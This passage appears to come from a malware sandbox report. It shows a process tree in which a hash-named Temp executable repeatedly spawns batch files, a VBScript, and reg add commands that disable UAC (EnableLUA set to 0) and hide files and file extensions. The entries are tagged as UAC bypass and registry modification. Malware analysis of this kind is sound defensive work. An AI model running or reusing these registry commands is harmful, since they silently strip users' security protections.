C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UgkQswkU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
236⤵
PID:1188

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
237⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
234⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
234⤵
PID:3456

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
234⤵
- Modifies registry key
PID:3924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jksYYwgo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
234⤵
PID:3584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
235⤵
PID:4236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
232⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
232⤵
PID:3232

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
232⤵
PID:5996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOEkMEwU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
232⤵
PID:652

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
233⤵
PID:5820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
230⤵
PID:4220

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
230⤵
PID:2344

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
230⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hQcQscUw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
230⤵
PID:1620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
231⤵
PID:236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
228⤵
- Modifies visibility of file extensions in Explorer
PID:3612

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
228⤵
PID:3744

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
228⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcIAkIow.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
228⤵
PID:5280

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
229⤵
PID:5000

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
226⤵
- Modifies visibility of file extensions in Explorer
PID:3548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
226⤵
PID:4936

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
226⤵
PID:5324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iowgEgYw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
226⤵
PID:4724

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
227⤵
PID:5188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
224⤵
- Modifies visibility of file extensions in Explorer
PID:3508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
224⤵
PID:5680

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
224⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOcMkoAE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
224⤵
PID:3272

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
225⤵
PID:3284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
222⤵
- Modifies visibility of file extensions in Explorer
PID:1188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
222⤵
PID:4020

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
222⤵
PID:5268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\keAcscsQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
222⤵
PID:5664

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
223⤵
PID:5040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
220⤵
- Modifies visibility of file extensions in Explorer
PID:5204

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
220⤵
PID:3920

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
220⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FKEkAIcY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
220⤵
PID:2596

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
221⤵
PID:5692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
218⤵
- Modifies visibility of file extensions in Explorer
PID:2568

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
218⤵
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
218⤵
- UAC bypass
PID:4224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vGQMYUgw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
218⤵
PID:124

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
219⤵
PID:3232

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
216⤵
PID:1028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
216⤵
PID:5724

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
216⤵
PID:3572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lMwEokwE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
216⤵
PID:3780

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
217⤵
PID:5732

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
214⤵
PID:3268

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
214⤵
PID:3548

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
214⤵
- UAC bypass
PID:5360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HCEYcsMM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
214⤵
PID:6128

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
215⤵
PID:3876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
212⤵
- Modifies visibility of file extensions in Explorer
PID:1464

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
212⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
212⤵
- UAC bypass
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qSosUgwM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
212⤵
PID:2124

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
213⤵
PID:1660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
210⤵
PID:5692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
210⤵
PID:3724

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
210⤵
PID:8

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uyUcEwUA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
210⤵
PID:3040

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
211⤵
PID:2140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
208⤵
PID:4216

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
208⤵
PID:5676

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
208⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ImgMMcIw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
208⤵
PID:3584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
209⤵
PID:3544

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
206⤵
- Modifies registry key
PID:5848

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
206⤵
- Modifies registry key
PID:2244

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
206⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uogAcoEE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
206⤵
PID:4680

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
207⤵
PID:5616

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
204⤵
- Modifies registry key
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
204⤵
PID:940

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
204⤵
- UAC bypass
PID:3156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hugowMkA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
204⤵
PID:1568

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
205⤵
PID:3780

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
202⤵
- Modifies visibility of file extensions in Explorer
PID:4844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
202⤵
PID:5304

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
202⤵
PID:932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VCsgYgko.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
202⤵
PID:488

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
203⤵
PID:1252

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
200⤵
- Modifies registry key
PID:4896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
200⤵
PID:2476

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
200⤵
- Modifies registry key
PID:2792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rWEQMcMA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
200⤵
PID:3508

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
201⤵
PID:3244

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
198⤵
PID:4876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
198⤵
PID:5836

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
198⤵
PID:3460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zQIAkskI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
198⤵
PID:1368

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
199⤵
PID:1188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
196⤵
PID:3060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
196⤵
- Modifies registry key
PID:2912

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
196⤵
- UAC bypass
PID:5016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aCkUEMAg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
196⤵
PID:4728

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
197⤵
PID:3724

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
194⤵
- Modifies visibility of file extensions in Explorer
PID:3536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
194⤵
PID:852

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
194⤵
- UAC bypass
PID:5204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EugoQQUs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
194⤵
PID:248

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
195⤵
PID:2300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
192⤵
- Modifies visibility of file extensions in Explorer
PID:5544

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
192⤵
- Modifies registry key
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
192⤵
- UAC bypass
- Modifies registry key
PID:3440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yqoYUMEw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
192⤵
PID:3584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
193⤵
PID:5028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
190⤵
PID:2832

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
190⤵
PID:5648

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
190⤵
PID:5792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YGQAMoEo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
190⤵
PID:1396

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
191⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
188⤵
- Modifies visibility of file extensions in Explorer
PID:4572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
188⤵
PID:5160

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
188⤵
- UAC bypass
- Modifies registry key
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TQgIEoIU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
188⤵
PID:1300

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
189⤵
PID:1568

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
186⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
186⤵
- Modifies registry key
PID:5888

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
186⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NoAQQIQs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
186⤵
PID:2000

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
187⤵
PID:1388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
184⤵
- Modifies visibility of file extensions in Explorer
PID:3136

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
184⤵
PID:2792

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
184⤵
- Modifies registry key
PID:5232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lUkIgggo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
184⤵
PID:5324

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
185⤵
PID:5988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
182⤵
- Modifies visibility of file extensions in Explorer
PID:572

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
182⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
182⤵
- UAC bypass
PID:4348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CkIYwEwI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
182⤵
PID:756

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
183⤵
PID:3304

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
180⤵
- Modifies visibility of file extensions in Explorer
PID:2912

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
180⤵
- Modifies registry key
PID:4644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
180⤵
PID:3332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\maQQYwYo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
180⤵
PID:2152

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
181⤵
PID:2596

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
178⤵
PID:3812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
178⤵
PID:5516

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
178⤵
- UAC bypass
- Modifies registry key
PID:5448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QQskwgME.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
178⤵
PID:428

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
179⤵
PID:668

